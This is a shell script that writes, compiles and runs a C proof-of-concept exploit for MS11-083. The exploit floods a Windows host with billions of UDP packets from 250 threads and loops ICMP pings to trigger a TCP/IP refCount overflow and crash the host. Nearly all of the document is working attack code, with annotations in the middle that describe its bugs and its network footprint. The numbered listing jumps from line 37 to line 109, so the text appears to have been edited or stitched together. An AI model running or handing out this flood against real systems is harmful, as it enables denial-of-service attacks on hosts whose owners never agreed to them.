MS11-083 PoC winnuke2011.sh

  1. #!/bin/sh
  2. cat >> winnuke2011.c << EOF
  3. /*
  4. * MS11-083 DoS/PoC exploit
  5. * ========================
  6. * This attempts to trigger the ICMP refCount overflow  
  7. * in TCP/IP stack of Win7/Vista/Win2k8 hosts. This
  8. * requires sending 2^32 UDP packets to a host on a closed
  9. * port, or 4,294,967,296 packets. A dereference function
  10. * must be called that is not triggered via UDP but ICMP  
  11. * echo packets. This exploit creates 250 threads and
  12. * floods a host with UDP packets and then attempts to
  13. * trigger the de-ref using ping. I calculated that it
  14. * would take approximately 52 days for the host to
  15. * enter a condition where this vulnerability is
  16. * triggerable.
  17. *
  18. * -- prdelka
  19. */
  20. #include <stdio.h>
  21. #include <stdlib.h>
  22. #include <pthread.h>
  23. #include <sys/types.h>
  24. #include <sys/socket.h>
  25. #include <netinet/in.h>
  26. #include <arpa/inet.h>
  27. #include <netdb.h>
  28. #include <stdio.h>
  29. #include <unistd.h>
  30. #include <string.h>
  31. #include <sys/time.h>
  32.  
  33. int port;
  34. int active = 0;
  35. pthread_mutex_t mutexactive;
  36. void *sendpackets(void *ptr);
  37.  
/*
 * Entry point. Parses <server> <port>, starts 250 sender threads one second
 * apart, forks a child that execs ./ping.sh against the server, then spins in
 * the parent until the active counter drops to zero.
 *
 * argv[1]: target hostname, passed unchanged to every thread and to ping.sh.
 * argv[2]: UDP port, converted with atoi() (no range or error checking).
 * Exits 1 on a usage error, 0 after the wait loop ends.
 *
 * From a monitoring standpoint the observable is a sustained single-source
 * UDP stream to one port plus a continuous ICMP echo loop from ping.sh.
 */
int main(int argc, char *argv[]) {
        pthread_t thread;
        int iret,lthreads; /* iret receives pthread_create()'s status but is never checked */
    pid_t pid;
    printf("[+] MS11-083 DoS/PoC exploit\n");
    if(argc<3){
        printf("[!] Usage : %s <server> <port>\n", argv[0]);
        exit(1);
    }
    /* argv for the child ("ping <server>"). envp is a single empty string, so the
       child gets no PATH; ping.sh copes by calling /sbin/ping with an absolute path. */
    char *const args[] = {"ping",argv[1],NULL};
    char *const envp[] = {"",NULL};
    port = atoi(argv[2]);
    for(lthreads=0;lthreads<250;lthreads++){//UDP flood
        /* The same pthread_t is overwritten every iteration and no thread is ever
           joined; threads are detached in effect only because main() never exits early. */
        iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
        printf("[-] Thread number %d started\n",lthreads);
        sleep(1);
    }
    printf("[-] One does not simply barrel roll into Mordor\n");
    pid = fork(); /* a fork() failure (pid == -1) is not handled */
    if(pid==0){// trigger deref.
        /* Relies on the current working directory holding ping.sh. The return value
           is not checked: if execve() fails, the child falls through into the
           while(active) loop below and spins alongside the parent. */
        execve("./ping.sh",args,envp);
    };
    /* Busy-wait with no sleep and no join, and active is read here without
       mutexactive. A thread that leaves via pthread_exit() on a socket or send
       error never decrements active, so this loop can run forever. */
    while(active){
    }
    printf("[-] You are finished. Patience is a virtue.\n");
    exit(0);
}

/*
 * Sender thread body. ptr is the target hostname (argv[1] from main()).
 *
 * Increments the global active counter, builds a 40-byte pseudo-random
 * payload, resolves the host, then sends that payload 4294967295 times to
 * the global port over one UDP socket, decrements active and exits.
 * Every exit path goes through pthread_exit() except the unknown-host case,
 * which calls exit() and ends the whole process. No value is returned to a
 * joiner because nothing in this file joins threads.
 */
void *sendpackets(void *ptr)
{
    int sd, rc, n, echoLen, flags, error, timeOut; /* n, echoLen, error, timeOut are unused */
    unsigned long i;
    struct sockaddr_in remoteServAddr; /* never zeroed; sin_zero stays uninitialised */
    struct hostent *h;
    char str[41];
    pthread_mutex_lock(&mutexactive);
    active++;
    pthread_mutex_unlock(&mutexactive);
    /* <time.h> is not included in this file (only <sys/time.h>), so whether time()
       is declared depends on the libc headers. rand()/srand() share one
       process-wide state across all 250 threads; because main() starts them a
       second apart, each call reseeds with a new second value. */
    srand(time(NULL));
    /* Byte values 30..107: mostly printable ASCII, but 30 and 31 are control
       characters, so the payload printed below is not guaranteed to be clean text. */
    for (i = 0;i < 40;++i){
        str[i] = (char)((rand() % 78) + 30);
    }
    str[40] = '\0'; // yes this was off-by-one. :(
    printf("[-] Sending payload '%s'\n",str);
    /* gethostbyname() typically returns a pointer to static storage and is not
       thread-safe; here 250 threads call it concurrently. Only NULL is checked,
       not h_addrtype. */
    h = gethostbyname(ptr);
    if(h==NULL) {
            printf("unknown host '%s' \n",(char*)ptr);
            exit(1); /* exit(), not pthread_exit(): this takes the whole process down */
    }
    remoteServAddr.sin_family = h->h_addrtype;
    /* Copies h_length bytes into the 4-byte s_addr; correct for an AF_INET result. */
    memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
    remoteServAddr.sin_port = htons(port);
    sd = socket(AF_INET,SOCK_DGRAM,0);
    if(sd<0){
        printf("[!] Cannot open socket\n");
        /* Exits with active still incremented, so main()'s wait loop never sees it drop. */
        pthread_exit((void*)0);
    }
    flags = 0;
    /* 2^32 - 1 datagrams per thread; strlen(str)+1 sends the terminating NUL as well. */
    for(i=0;i<4294967295;i++){
        rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
        if(rc<0){
            printf("[!] Cannot send data\n");
                close(sd);
            /* Same as the socket() failure path: leaves without decrementing active. */
            pthread_exit((void*)0);
            }
    }
    pthread_mutex_lock(&mutexactive);
    active--;
    pthread_mutex_unlock(&mutexactive);
    /* sd is not closed on this, the normal, path. */
    pthread_exit(NULL);
}
  109. EOF
  110. cat >> ping.sh << EOF
  111. #!/bin/sh
  112. while \`true\`;do /sbin/ping -c 1 \$1;done
  113. EOF
  114. chmod +x ping.sh
  115. gcc winnuke2011.c -o winnuke2011
  116. ./winnuke2011
  117.  
  118.  